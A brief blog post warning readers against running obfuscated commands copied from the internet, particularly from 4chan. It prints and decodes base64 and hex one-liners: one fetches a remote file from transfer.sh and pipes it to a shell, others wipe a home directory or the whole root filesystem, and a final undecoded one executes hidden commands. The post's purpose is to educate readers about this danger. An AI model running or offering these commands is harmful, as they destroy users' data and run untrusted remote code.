Posted: . At: 8:14 AM. This was 6 months ago. Post ID: 18622
Page permalink. WordPress uses cookies, or tiny pieces of information stored on your computer, to verify who you are. There are cookies for logged in users and for commenters.
These cookies expire two weeks after they are set.


This is why you do not run strange commands off the Internet.

by

This is not a good command to actually run. Especially one from 4chan.

Do not run strange commands off the Internet, especially one from the notorious website 4chan. This is very dangerous.

This is the command in question.

echo d2dldCAtcSAtTyAuL3NwYWwgaHR0cHM6Ly90cmFuc2Zlci5zaC96eFFORy9zbzM0IHwgY2F0IHNwYWwgfCBzaAoK | base64 -d | sh

And this is how to find out what it does.

(jcartwright@localhost) 192.168.1.5 ~  $ echo d2dldCAtcSAtTyAuL3NwYWwgaHR0cHM6Ly90cmFuc2Zlci5zaC96eFFORy9zbzM0IHwgY2F0IHNwYWwgfCBzaAoK | base64 -d
wget -q -O ./spal https://transfer.sh/zxQNG/so34 | cat spal | sh

This is another example.

echo cm0gLXJmIC9ob21lL3R5bGVyCg== | base64 -d | bash

And this is what it does.

(jcartwright@localhost) 192.168.1.5 ~  $ echo cm0gLXJmIC9ob21lL3R5bGVyCg== | base64 -d
rm -rf /home/tyler

And obviously, this example is just as damaging.

b695a6de804e:/# echo $(echo 7375646f20726d202d7266202d2d6e6f2d70726573657276652d726f6f74202f0a | xxd -r -ps)
sudo rm -rf --no-preserve-root /

And why not play music? Although this one is actually getting nonsense data from /dev/urandom and then creating a huge tarball archive and doing something malicious with it.

echo 1f8b08000000000000032bca55d02d4a53d0d5cdcbd72d284a2d4e2d2a4bd52dcacf2f51d05730b2d34f492dd3cf2bcdc9e10200c2ed1a7128000000 | xxd -r -p | gzip -d | while read c; do $c; done | aplay

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.